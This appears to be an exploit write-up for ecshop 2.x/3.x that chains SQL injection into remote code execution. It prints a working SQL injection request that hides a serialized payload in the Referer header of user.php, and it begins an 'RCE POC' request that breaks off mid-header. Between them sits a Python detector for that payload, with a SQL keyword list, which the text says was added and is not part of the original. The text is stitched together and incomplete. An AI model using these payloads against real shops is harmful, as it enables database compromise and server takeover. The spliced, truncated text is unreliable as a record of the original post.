From SQLi to RCE – ecshop 2/3.x Getshell

This post has two parts:

  1. ecshop 2.x getshell
  2. Bypass ecshop 3.x WAF

Exploit

ecshop 2.x

SQLi POC

```http
GET /user.php?act=login HTTP/1.1
Host: test1.ecshop.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:68:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)";s:2:"id";i:1;}
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Connection: close
Upgrade-Insecure-Requests: 1
```
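The Referer in the POC above is not a URL at all: it is a 32-character hex prefix, the literal `ads|`, and a PHP-serialized array whose `num` member should only ever hold a numeric LIMIT offset/count pair. The following detection helper is an added example, not code from the original post; it parses that shape out of raw HTTP requests and flags any `num` member that contains SQL. The sample requests, the header-splitting helper and the keyword list are constructed for this example.

```python
import re

# Shape of the Referer seen in the POC: <32 hex>ads|<PHP serialized array>.
SERIALIZED_REFERER = re.compile(r'^(?P<hash>[0-9a-f]{32})ads\|(?P<payload>a:\d+:\{.*\})$')
# The "num" member of that array, which the POC uses to smuggle SQL.
NUM_MEMBER = re.compile(r's:3:"num";s:\d+:"(?P<value>[^"]*)";')
# What a legitimate "num" value looks like: "<offset>,<count>" or a bare count.
LIMIT_PAIR = re.compile(r'^\d+(,\d+)?$')
# Assumed keyword list for triage; extend it for your own environment.
SQL_HINTS = ("procedure analyse", "extractvalue", "updatexml", "select", "union")


def referer_from_request(raw):
    """Return the Referer header value of a raw HTTP request text, or None."""
    for line in raw.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "referer":
            return value.strip()
    return None


def inspect_referer(referer):
    """Return a finding dict when the Referer matches the injection shape, else None."""
    m = SERIALIZED_REFERER.match(referer)
    if not m:
        return None
    finding = {"hash": m["hash"], "num": None, "sql_hints": [], "severity": "medium"}
    n = NUM_MEMBER.search(m["payload"])
    if n:
        finding["num"] = n["value"]
        finding["sql_hints"] = [h for h in SQL_HINTS if h in n["value"].lower()]
        # Anything that is not a plain LIMIT pair is treated as an injection attempt.
        if finding["sql_hints"] or not LIMIT_PAIR.match(n["value"]):
            finding["severity"] = "high"
    return finding


def scan_requests(requests):
    """Run inspect_referer over each raw request and collect the findings."""
    findings = []
    for raw in requests:
        ref = referer_from_request(raw)
        if ref is not None and (f := inspect_referer(ref)):
            findings.append(f)
    return findings


# Constructed sample requests: one ordinary, one mirroring the POC above.
SAMPLES = [
    "GET /goods.php?id=12 HTTP/1.1\nHost: test1.ecshop.com\nReferer: https://example.com/\n",
    "GET /user.php?act=login HTTP/1.1\nHost: test1.ecshop.com\n"
    'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:68:"0,1 procedure analyse'
    '(extractvalue(rand(),concat(0x7e,version())),1)";s:2:"id";i:1;}\n',
]
```

Feeding `scan_requests(SAMPLES)` yields one high-severity finding for the second request, with `procedure analyse` and `extractvalue` listed as the matched hints.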

RCE POC

```http
GET /user.php?act=login HTTP/1.1
Host: test1.ecshop.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzi
```